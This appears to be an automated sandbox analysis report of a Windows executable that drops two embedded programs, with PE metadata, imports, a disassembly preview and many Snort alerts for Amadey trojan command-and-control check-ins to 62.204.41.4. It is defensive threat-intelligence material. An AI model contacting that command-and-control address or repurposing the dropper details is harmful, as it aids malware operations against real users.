TLSH:	3DB40207D6EC8022D4F557B019F343C3063B7EA15B7893AB224D9C5A1D73AA4A6713BB
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........%...K...K...K...N...K...H...K...O...K...J...K...J...K...C...K.......K...I...K.Rich..K.........PE..L....`.b.................d.

File Icon


Icon Hash:	f8e0e4e8ecccc870

Static PE Info

General

Entrypoint:	0x406a60
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x628D60E2 [Tue May 24 22:49:06 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	10
OS Version Minor:	0
File Version Major:	10
File Version Minor:	0
Subsystem Version Major:	10
Subsystem Version Minor:	0
Import Hash:	646167cce332c1c252cdcb1839e0cf48

Entrypoint Preview

Instruction
call 00007FEDA4ACE4A5h
jmp 00007FEDA4ACDDB5h
push 00000058h
push 004072B8h
call 00007FEDA4ACE547h
xor ebx, ebx
mov dword ptr [ebp-20h], ebx
lea eax, dword ptr [ebp-68h]
push eax
call dword ptr [0040A184h]
mov dword ptr [ebp-04h], ebx
mov eax, dword ptr fs:[00000018h]
mov esi, dword ptr [eax+04h]
mov edi, ebx
mov edx, 004088ACh
mov ecx, esi
xor eax, eax
lock cmpxchg dword ptr [edx], ecx
test eax, eax
je 00007FEDA4ACDDCAh
cmp eax, esi
jne 00007FEDA4ACDDB9h
xor esi, esi
inc esi
mov edi, esi
jmp 00007FEDA4ACDDC2h
push 000003E8h
call dword ptr [0040A188h]
jmp 00007FEDA4ACDD89h
xor esi, esi
inc esi
cmp dword ptr [004088B0h], esi
jne 00007FEDA4ACDDBCh
push 0000001Fh
call 00007FEDA4ACE2DBh
pop ecx
jmp 00007FEDA4ACDDECh
cmp dword ptr [004088B0h], ebx
jne 00007FEDA4ACDDDEh
mov dword ptr [004088B0h], esi
push 004010C4h
push 004010B8h
call 00007FEDA4ACDF06h
pop ecx
pop ecx
test eax, eax
je 00007FEDA4ACDDC9h
mov dword ptr [ebp-04h], FFFFFFFEh
mov eax, 000000FFh
jmp 00007FEDA4ACDEE9h
mov dword ptr [004081E4h], esi
cmp dword ptr [004088B0h], esi
jne 00007FEDA4ACDDCDh
push 004010B4h
push 004010ACh
call 00007FEDA4ACE495h
pop ecx
pop ecx
mov dword ptr [000088B0h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xa28c	0xb4	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc000	0x7aae4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x87000	0x888	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x1410	0x54	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x1008	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0xa000	0x288	.idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6314	0x6400	False	0.5744140625	data	6.314163792045976	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x8000	0x1a48	0x200	False	0.609375	data	4.970639543960129	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xa000	0x1052	0x1200	False	0.4140625	data	5.025949912909207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0xc000	0x7b000	0x7ac00	False	0.9243293342668024	data	7.854654116031079	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x87000	0x888	0xa00	False	0.746484375	data	6.222637930812128	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
AVI	0xcb30	0x2e1a	RIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bpp	English	United States
RT_ICON	0xf94c	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	English	United States
RT_ICON	0xffb4	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	English	United States
RT_ICON	0x1029c	0x1e8	Device independent bitmap graphic, 24 x 48 x 4, image size 288	English	United States
RT_ICON	0x10484	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	English	United States
RT_ICON	0x105ac	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	English	United States
RT_ICON	0x11454	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	English	United States
RT_ICON	0x11cfc	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	English	United States
RT_ICON	0x123c4	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	English	United States
RT_ICON	0x1292c	0xd9d2	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	English	United States
RT_ICON	0x20300	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	English	United States
RT_ICON	0x228a8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	English	United States
RT_ICON	0x23950	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	English	United States
RT_ICON	0x242d8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	English	United States
RT_DIALOG	0x24740	0x2f2	data	English	United States
RT_DIALOG	0x24a34	0x35c	data	Russian	Russia
RT_DIALOG	0x24d90	0x1b0	data	English	United States
RT_DIALOG	0x24f40	0x1b4	data	Russian	Russia
RT_DIALOG	0x250f4	0x166	data	English	United States
RT_DIALOG	0x2525c	0x168	data	Russian	Russia
RT_DIALOG	0x253c4	0x1c0	data	English	United States
RT_DIALOG	0x25584	0x1e0	data	Russian	Russia
RT_DIALOG	0x25764	0x130	data	English	United States
RT_DIALOG	0x25894	0x150	data	Russian	Russia
RT_DIALOG	0x259e4	0x120	data	English	United States
RT_DIALOG	0x25b04	0x122	data	Russian	Russia
RT_STRING	0x25c28	0x8c	Matlab v4 mat-file (little endian) l, numeric, rows 0, columns 0	English	United States
RT_STRING	0x25cb4	0x86	Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0	Russian	Russia
RT_STRING	0x25d3c	0x520	data	English	United States
RT_STRING	0x2625c	0x52e	data	Russian	Russia
RT_STRING	0x2678c	0x5cc	data	English	United States
RT_STRING	0x26d58	0x592	data	Russian	Russia
RT_STRING	0x272ec	0x4b0	data	English	United States
RT_STRING	0x2779c	0x4b2	data	Russian	Russia
RT_STRING	0x27c50	0x44a	data	English	United States
RT_STRING	0x2809c	0x43e	data	Russian	Russia
RT_STRING	0x284dc	0x3ce	data	English	United States
RT_STRING	0x288ac	0x2fc	data	Russian	Russia
RT_RCDATA	0x28ba8	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x28bb0	0x5ce06	Microsoft Cabinet archive data, many, 380422 bytes, 2 files, at 0x2c +A "bfCg.exe" +A "xriv.exe", ID 1563, number 1, 18 datablocks, 0x1503 compression	English	United States
RT_RCDATA	0x859b8	0x4	data	English	United States
RT_RCDATA	0x859bc	0x24	data	English	United States
RT_RCDATA	0x859e0	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x859e8	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x859f0	0x4	data	English	United States
RT_RCDATA	0x859f4	0x9	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x85a00	0x4	data	English	United States
RT_RCDATA	0x85a04	0x9	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x85a10	0x4	data	English	United States
RT_RCDATA	0x85a14	0x6	data	English	United States
RT_RCDATA	0x85a1c	0x7	ASCII text, with no line terminators	English	United States
RT_RCDATA	0x85a24	0x7	ASCII text, with no line terminators	English	United States
RT_GROUP_ICON	0x85a2c	0xbc	data	English	United States
RT_VERSION	0x85ae8	0x408	data	English	United States
RT_VERSION	0x85ef0	0x410	data	Russian	Russia
RT_MANIFEST	0x86300	0x7e2	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States

Imports

DLL	Import
ADVAPI32.dll	GetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
KERNEL32.dll	_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
GDI32.dll	GetDeviceCaps
USER32.dll	SetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
msvcrt.dll	_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
COMCTL32.dll
Cabinet.dll
VERSION.dll	GetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Russian	Russia

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
192.168.2.662.204.41.449858802027700 02/07/23-20:01:29.126524	TCP	2027700	ET TROJAN Amadey CnC Check-In	49858	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450186802027700 02/07/23-20:03:04.107236	TCP	2027700	ET TROJAN Amadey CnC Check-In	50186	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450318802027700 02/07/23-20:03:38.985319	TCP	2027700	ET TROJAN Amadey CnC Check-In	50318	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450088802027700 02/07/23-20:02:36.767849	TCP	2027700	ET TROJAN Amadey CnC Check-In	50088	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450284802027700 02/07/23-20:03:30.624651	TCP	2027700	ET TROJAN Amadey CnC Check-In	50284	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449763802027700 02/07/23-20:01:01.550107	TCP	2027700	ET TROJAN Amadey CnC Check-In	49763	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449791802027700 02/07/23-20:01:10.547144	TCP	2027700	ET TROJAN Amadey CnC Check-In	49791	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450030802027700 02/07/23-20:02:18.384404	TCP	2027700	ET TROJAN Amadey CnC Check-In	50030	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450382802027700 02/07/23-20:03:54.707955	TCP	2027700	ET TROJAN Amadey CnC Check-In	50382	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450480802027700 02/07/23-20:04:18.662379	TCP	2027700	ET TROJAN Amadey CnC Check-In	50480	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449800802027700 02/07/23-20:01:12.702989	TCP	2027700	ET TROJAN Amadey CnC Check-In	49800	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449956802027700 02/07/23-20:01:56.737292	TCP	2027700	ET TROJAN Amadey CnC Check-In	49956	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450416802027700 02/07/23-20:04:03.085073	TCP	2027700	ET TROJAN Amadey CnC Check-In	50416	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450125802027700 02/07/23-20:02:46.439463	TCP	2027700	ET TROJAN Amadey CnC Check-In	50125	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450379802027700 02/07/23-20:03:53.987905	TCP	2027700	ET TROJAN Amadey CnC Check-In	50379	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450477802027700 02/07/23-20:04:17.942956	TCP	2027700	ET TROJAN Amadey CnC Check-In	50477	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450027802027700 02/07/23-20:02:17.657151	TCP	2027700	ET TROJAN Amadey CnC Check-In	50027	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450223802027700 02/07/23-20:03:13.167790	TCP	2027700	ET TROJAN Amadey CnC Check-In	50223	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450321802027700 02/07/23-20:03:39.741323	TCP	2027700	ET TROJAN Amadey CnC Check-In	50321	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450256802027700 02/07/23-20:03:21.219153	TCP	2027700	ET TROJAN Amadey CnC Check-In	50256	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449796802027700 02/07/23-20:01:11.751019	TCP	2027700	ET TROJAN Amadey CnC Check-In	49796	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449951802027700 02/07/23-20:01:55.550313	TCP	2027700	ET TROJAN Amadey CnC Check-In	49951	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450002802027700 02/07/23-20:02:11.408990	TCP	2027700	ET TROJAN Amadey CnC Check-In	50002	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450411802027700 02/07/23-20:04:01.821830	TCP	2027700	ET TROJAN Amadey CnC Check-In	50411	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449928802027700 02/07/23-20:01:49.894595	TCP	2027700	ET TROJAN Amadey CnC Check-In	49928	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450120802027700 02/07/23-20:02:44.901958	TCP	2027700	ET TROJAN Amadey CnC Check-In	50120	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450161802027700 02/07/23-20:02:58.254042	TCP	2027700	ET TROJAN Amadey CnC Check-In	50161	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450374802027700 02/07/23-20:03:52.768199	TCP	2027700	ET TROJAN Amadey CnC Check-In	50374	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450469802027700 02/07/23-20:04:16.004547	TCP	2027700	ET TROJAN Amadey CnC Check-In	50469	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450215802027700 02/07/23-20:03:11.200842	TCP	2027700	ET TROJAN Amadey CnC Check-In	50215	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450452802027700 02/07/23-20:04:11.861795	TCP	2027700	ET TROJAN Amadey CnC Check-In	50452	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449833802027700 02/07/23-20:01:20.483013	TCP	2027700	ET TROJAN Amadey CnC Check-In	49833	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450019802027700 02/07/23-20:02:15.689584	TCP	2027700	ET TROJAN Amadey CnC Check-In	50019	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449727802027700 02/07/23-20:00:53.058922	TCP	2027700	ET TROJAN Amadey CnC Check-In	49727	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450055802027700 02/07/23-20:02:24.503969	TCP	2027700	ET TROJAN Amadey CnC Check-In	50055	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449886802027700 02/07/23-20:01:35.832637	TCP	2027700	ET TROJAN Amadey CnC Check-In	49886	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450091802027700 02/07/23-20:02:37.622394	TCP	2027700	ET TROJAN Amadey CnC Check-In	50091	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450346802027700 02/07/23-20:03:45.861770	TCP	2027700	ET TROJAN Amadey CnC Check-In	50346	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449768802027700 02/07/23-20:01:02.811173	TCP	2027700	ET TROJAN Amadey CnC Check-In	49768	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450096802027700 02/07/23-20:02:38.862015	TCP	2027700	ET TROJAN Amadey CnC Check-In	50096	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449964802027700 02/07/23-20:01:58.773796	TCP	2027700	ET TROJAN Amadey CnC Check-In	49964	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450251802027700 02/07/23-20:03:20.007203	TCP	2027700	ET TROJAN Amadey CnC Check-In	50251	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449923802027700 02/07/23-20:01:46.547163	TCP	2027700	ET TROJAN Amadey CnC Check-In	49923	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450292802027700 02/07/23-20:03:32.559192	TCP	2027700	ET TROJAN Amadey CnC Check-In	50292	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449881802027700 02/07/23-20:01:34.599060	TCP	2027700	ET TROJAN Amadey CnC Check-In	49881	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449878802027700 02/07/23-20:01:34.080304	TCP	2027700	ET TROJAN Amadey CnC Check-In	49878	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449976802027700 02/07/23-20:02:01.442060	TCP	2027700	ET TROJAN Amadey CnC Check-In	49976	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449722802027700 02/07/23-20:00:51.810569	TCP	2027700	ET TROJAN Amadey CnC Check-In	49722	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449771802027700 02/07/23-20:01:03.532617	TCP	2027700	ET TROJAN Amadey CnC Check-In	49771	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449915802027700 02/07/23-20:01:43.056279	TCP	2027700	ET TROJAN Amadey CnC Check-In	49915	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450050802027700 02/07/23-20:02:23.248250	TCP	2027700	ET TROJAN Amadey CnC Check-In	50050	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450133802027700 02/07/23-20:02:51.437305	TCP	2027700	ET TROJAN Amadey CnC Check-In	50133	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450387802027700 02/07/23-20:03:55.955538	TCP	2027700	ET TROJAN Amadey CnC Check-In	50387	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449805802027700 02/07/23-20:01:13.918183	TCP	2027700	ET TROJAN Amadey CnC Check-In	49805	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450341802027700 02/07/23-20:03:44.643209	TCP	2027700	ET TROJAN Amadey CnC Check-In	50341	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450326802027700 02/07/23-20:03:40.953159	TCP	2027700	ET TROJAN Amadey CnC Check-In	50326	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450424802027700 02/07/23-20:04:05.016891	TCP	2027700	ET TROJAN Amadey CnC Check-In	50424	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450243802027700 02/07/23-20:03:17.999930	TCP	2027700	ET TROJAN Amadey CnC Check-In	50243	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450105802027700 02/07/23-20:02:41.198188	TCP	2027700	ET TROJAN Amadey CnC Check-In	50105	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450071802027700 02/07/23-20:02:32.235512	TCP	2027700	ET TROJAN Amadey CnC Check-In	50071	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450007802027700 02/07/23-20:02:12.669391	TCP	2027700	ET TROJAN Amadey CnC Check-In	50007	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450359802027700 02/07/23-20:03:49.032956	TCP	2027700	ET TROJAN Amadey CnC Check-In	50359	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449743802027700 02/07/23-20:00:56.902351	TCP	2027700	ET TROJAN Amadey CnC Check-In	49743	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449841802027700 02/07/23-20:01:22.423646	TCP	2027700	ET TROJAN Amadey CnC Check-In	49841	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449997802027700 02/07/23-20:02:10.169392	TCP	2027700	ET TROJAN Amadey CnC Check-In	49997	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450178802027700 02/07/23-20:03:02.400607	TCP	2027700	ET TROJAN Amadey CnC Check-In	50178	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450362802027700 02/07/23-20:03:49.798075	TCP	2027700	ET TROJAN Amadey CnC Check-In	50362	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449992802027700 02/07/23-20:02:06.575939	TCP	2027700	ET TROJAN Amadey CnC Check-In	49992	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450068802027700 02/07/23-20:02:31.452026	TCP	2027700	ET TROJAN Amadey CnC Check-In	50068	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450460802027700 02/07/23-20:04:13.772290	TCP	2027700	ET TROJAN Amadey CnC Check-In	50460	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449989802027700 02/07/23-20:02:05.120374	TCP	2027700	ET TROJAN Amadey CnC Check-In	49989	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449735802027700 02/07/23-20:00:54.983578	TCP	2027700	ET TROJAN Amadey CnC Check-In	49735	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450354802027700 02/07/23-20:03:47.847893	TCP	2027700	ET TROJAN Amadey CnC Check-In	50354	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450022802027700 02/07/23-20:02:16.443010	TCP	2027700	ET TROJAN Amadey CnC Check-In	50022	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450063802027700 02/07/23-20:02:28.396717	TCP	2027700	ET TROJAN Amadey CnC Check-In	50063	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450276802027700 02/07/23-20:03:28.648274	TCP	2027700	ET TROJAN Amadey CnC Check-In	50276	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449948802027700 02/07/23-20:01:54.830001	TCP	2027700	ET TROJAN Amadey CnC Check-In	49948	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450141802027700 02/07/23-20:02:53.400943	TCP	2027700	ET TROJAN Amadey CnC Check-In	50141	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450395802027700 02/07/23-20:03:57.910152	TCP	2027700	ET TROJAN Amadey CnC Check-In	50395	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450100802027700 02/07/23-20:02:39.901405	TCP	2027700	ET TROJAN Amadey CnC Check-In	50100	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450313802027700 02/07/23-20:03:37.774355	TCP	2027700	ET TROJAN Amadey CnC Check-In	50313	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450271802027700 02/07/23-20:03:27.422593	TCP	2027700	ET TROJAN Amadey CnC Check-In	50271	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449984802027700 02/07/23-20:02:03.441087	TCP	2027700	ET TROJAN Amadey CnC Check-In	49984	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449943802027700 02/07/23-20:01:53.532965	TCP	2027700	ET TROJAN Amadey CnC Check-In	49943	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449730802027700 02/07/23-20:00:53.793502	TCP	2027700	ET TROJAN Amadey CnC Check-In	49730	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450289802027700 02/07/23-20:03:31.813234	TCP	2027700	ET TROJAN Amadey CnC Check-In	50289	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450035802027700 02/07/23-20:02:19.615798	TCP	2027700	ET TROJAN Amadey CnC Check-In	50035	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450248802027700 02/07/23-20:03:19.236086	TCP	2027700	ET TROJAN Amadey CnC Check-In	50248	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450207802027700 02/07/23-20:03:09.251394	TCP	2027700	ET TROJAN Amadey CnC Check-In	50207	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450432802027700 02/07/23-20:04:06.987943	TCP	2027700	ET TROJAN Amadey CnC Check-In	50432	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450390802027700 02/07/23-20:03:56.676042	TCP	2027700	ET TROJAN Amadey CnC Check-In	50390	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450174802027700 02/07/23-20:03:01.410759	TCP	2027700	ET TROJAN Amadey CnC Check-In	50174	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450367802027700 02/07/23-20:03:51.006859	TCP	2027700	ET TROJAN Amadey CnC Check-In	50367	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449748802027700 02/07/23-20:00:58.128864	TCP	2027700	ET TROJAN Amadey CnC Check-In	49748	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450015802027700 02/07/23-20:02:14.676485	TCP	2027700	ET TROJAN Amadey CnC Check-In	50015	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450113802027700 02/07/23-20:02:43.134587	TCP	2027700	ET TROJAN Amadey CnC Check-In	50113	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450269802027700 02/07/23-20:03:26.932435	TCP	2027700	ET TROJAN Amadey CnC Check-In	50269	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450263802027700 02/07/23-20:03:25.380080	TCP	2027700	ET TROJAN Amadey CnC Check-In	50263	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450272802027700 02/07/23-20:03:27.657286	TCP	2027700	ET TROJAN Amadey CnC Check-In	50272	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450370802027700 02/07/23-20:03:51.805979	TCP	2027700	ET TROJAN Amadey CnC Check-In	50370	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450361802027700 02/07/23-20:03:49.565590	TCP	2027700	ET TROJAN Amadey CnC Check-In	50361	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449739802027700 02/07/23-20:00:55.935980	TCP	2027700	ET TROJAN Amadey CnC Check-In	49739	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450006802027700 02/07/23-20:02:12.401268	TCP	2027700	ET TROJAN Amadey CnC Check-In	50006	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450358802027700 02/07/23-20:03:48.800828	TCP	2027700	ET TROJAN Amadey CnC Check-In	50358	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449837802027700 02/07/23-20:01:21.459260	TCP	2027700	ET TROJAN Amadey CnC Check-In	49837	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450202802027700 02/07/23-20:03:08.029585	TCP	2027700	ET TROJAN Amadey CnC Check-In	50202	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450456802027700 02/07/23-20:04:12.818077	TCP	2027700	ET TROJAN Amadey CnC Check-In	50456	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.450104802027700 02/07/23-20:02:40.952138	TCP	2027700	ET TROJAN Amadey CnC Check-In	50104	80	192.168.2.6	62.204.41.4
192.168.2.662.204.41.449809802027700 02/07/23-20:01:14.874634	TCP	2027700	ET TROJAN Amadey CnC Check-In	49809	80	192.168.2.6	62.204.41.4
